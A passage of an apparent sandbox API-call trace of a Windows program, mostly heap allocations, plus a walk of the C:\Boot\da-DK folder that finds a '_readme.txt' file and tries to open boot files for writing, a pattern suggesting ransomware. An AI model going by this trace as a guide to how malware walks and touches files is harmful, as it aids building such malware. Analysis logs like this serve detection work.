lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.932] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.932] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.932] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.932] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.932] PathFindFileNameW (pszPath="") returned="" [0129.932] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.933] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.933] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.933] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.933] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2280 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.934] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2280 [0129.934] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.934] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0129.934] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.934] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.934] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.935] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.935] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.935] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned=".mui" [0129.935] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.935] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0129.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.935] PathFindExtensionW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned=".txt" [0129.935] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0129.935] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe373bb00, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.936] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.936] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.936] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.936] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.937] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.937] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.938] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.938] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.940] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0129.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 